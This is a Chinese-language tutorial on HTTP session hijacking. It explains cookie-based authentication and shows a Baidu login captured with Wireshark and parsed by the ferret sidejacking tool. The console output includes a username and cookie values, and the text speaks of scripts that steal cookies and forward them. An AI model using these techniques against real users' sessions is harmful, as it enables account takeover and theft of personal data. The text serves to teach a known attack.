前言:
会话劫持(Session hijacking),是一种网络攻击手段,黑客可以通过破坏已建立的数据流而实现劫持。常见的有:SMB会话劫持 中间人攻击 和本文要写的HTTP Session Hijacking Web应用程序是通过2种方式来判断和跟踪不同用户的:Cookie或者Session(也叫做会话型Cookie)。其中Cookie是存储在本地计算机上的,过期时间很长,所以针对Cookie的攻击手段一般是盗取用户Cookie然后伪造Cookie冒充该用户;而Session由于其存在于服务端,随着会话的注销而失效(很快过期),往往难于利用。所以一般来说Session认证较之Cookie认证安全。
如果你关注Web安全,相信你一定看到过记录跨站得到Cookie的脚本程序,我们也需要一个类似的程序,但功能不是记录,而是立即转发(因为当前会话随时可能由于管理员退出而失效)
攻击:
简单的做下演示吧,我们打开百度搜索“去哪里捐精”,然后登录 ,中间用Wireshark抓取数据
Wireshark抓取的数据 ,百度的登录是HTTPS的

停止Wireshark作业,吧数据库保存下来

然后分析数据包:
C:\Documents and Settings\brk>cd \
C:\>cd sidejacking
C:\sidejacking>dir 驱动器 C 中的卷没有标签。 卷的序列号是 0031-2EC7
C:\sidejacking 的目录
2012-02-06 16:53 <DIR> . 2012-02-06 16:53 <DIR> .. 2012-02-06 16:53 146,103 baidu.pcap 2007-08-08 22:37 172,093 ferret.exe 2007-08-08 23:41 401,408 hamster-help.doc 2007-08-08 22:52 77,824 hamster.exe 2007-08-08 23:42 695 readme.txt 5 个文件 798,123 字节 2 个目录 17,093,853,184 可用字节
C:\sidejacking>ferret.exe -r baidu.pcap -- FERRET 1.1.3 - 2007 (c) Errata Security -- build = Aug 8 2007 22:37:48 (32-bits) -- WinPcap version 4.1.2 (packet.dll version 4.1.0.2001), based on libpcap versi on 1.0 branch 1_0_rel0b (20091008) proto="HTTP", op="POST", Host="ocsp.verisign.com", URL="/" ID-IP=[192.1.1.5], User-Agent="Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/2010 0101 Firefox/6.0.2" proto="HTTP", op="GET", Host="www.baidu.com", URL="/cache/user/j.html?callback=b dLoginReply&error=0&un=dis9teama2&needToModifyPassword=0&index=" ---------- 省略 ---------------- TEST="icmp", type=130, code=0 ID-MAC=[6a:47:c5:af:3b:a9], ipv6=[FE8:6847:C5FF:FEAF:3BA9] TEST="icmp", type=131, code=0 ID-IP=[192.1.1.1], Multicast-groups=[224.0.0.251], groupname="mDNS" ID-IP=[192.1.1.1], macaddr=[6a:47:c5:af:3b:a9] ID-MAC=[6a:47:c5:af:3b:a9], ip=[192.1.1.1] ID-IP=[192.1.1.5], macaddr=[08:08:27:00:00:04] ID-MAC=[08:08:27:00:00:04], ip=[192.1.1.5] proto="DNS", query="A", ip.src=[192.1.1.5], name="safebrowsing.clients.google.co m" ID-DNS="safebrowsing.clients.google.com", address=[203.208.45.200] proto="HTTP", op="POST", Host="safebrowsing.clients.google.com", URL="/safebrows ing/downloads?client=navclient-auto-ffox&appver=6.0.2&pver=2.2&wrkey=AKEgNis1mHM HmaKiWTHg9385w-2XbYzMu2ppI64um3IE3INLRvIVXaeafa9xwDwGKhOpWlGfeOAmW-2_98OxvzPCaAA bHymnTA==" proto="HTTP", op="POST", Host="safebrowsing.clients.google.com", URL="/safebrows ing/downloads?client=navclient-auto-ffox&appver=6.0.2&pver=2.2&wrkey=AKEgNis1mHM HmaKiWTHg9385w-2XbYzMu2ppI64um3IE3INLRvIVXaeafa9xwDwGKhOpWlGfeOAmW-2_98OxvzPCaAA bHymnTA==", cookie="PREF=ID=0889b5d602ad153d:TM=1327858580:LM=1327858580:S=7ENYg UTv-2SxxSfI" ERROR: 12 TCP sessions remaining -- graceful exit --
C:\sidejacking>
|
|